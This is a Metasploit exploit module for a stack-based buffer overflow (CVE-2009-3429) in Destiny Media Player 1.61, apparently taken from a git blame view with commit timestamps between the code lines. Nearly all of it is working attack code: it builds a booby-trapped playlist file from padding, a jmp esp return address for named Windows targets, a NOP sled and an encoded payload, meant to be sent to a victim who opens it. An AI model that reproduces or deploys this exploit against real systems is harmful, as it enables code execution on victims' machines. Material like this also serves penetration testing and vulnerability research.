2009-05-03 12:12:08 +00:00
|
|
|
##
|
2013-10-15 18:50:46 +00:00
|
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2009-05-03 12:12:08 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2013-08-30 21:28:54 +00:00
|
|
|
Rank = GoodRanking
|
2009-05-03 12:12:08 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Exploit::FILEFORMAT
|
2009-05-03 12:12:08 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Destiny Media Player 1.61 PLS M3U Buffer Overflow',
|
|
|
|
'Description' => %q{
|
|
|
|
This module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.
|
|
|
|
An attacker must send the file to victim and the victim must open the file. File-->Open Playlist
|
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' => [ 'Trancek <trancek[at]yashira.org>' ],
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'CVE', '2009-3429' ],
|
|
|
|
[ 'OSVDB', '53249' ],
|
|
|
|
[ 'EDB', '7651' ],
|
|
|
|
[ 'BID', '33091' ]
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 800,
|
|
|
|
'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
|
|
|
|
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
},
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
# Tested ok patrickw 20090503
|
|
|
|
[ 'Destiny Universal', { 'Ret' => 0x00bf9d4d } ], #jmp esp Destiny.exe
|
|
|
|
[ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp
|
|
|
|
],
|
|
|
|
'Privileged' => false,
|
|
|
|
'DisclosureDate' => 'Jan 03 2009',
|
|
|
|
'DefaultTarget' => 0))
|
2009-05-03 12:12:08 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'exploit_destiny.m3u']),
|
|
|
|
], self.class)
|
2009-05-03 12:12:08 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2009-05-03 12:12:08 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def exploit
|
2009-05-03 12:12:08 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
filepls = rand_text_alpha_upper(2052)
|
|
|
|
filepls << [target.ret].pack('V')
|
|
|
|
filepls << make_nops(10)
|
|
|
|
filepls << payload.encoded
|
|
|
|
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
2009-05-03 12:12:08 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
file_create(filepls)
|
2009-05-03 12:12:08 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2009-05-03 12:12:08 +00:00
|
|
|
|
|
|
|
end
|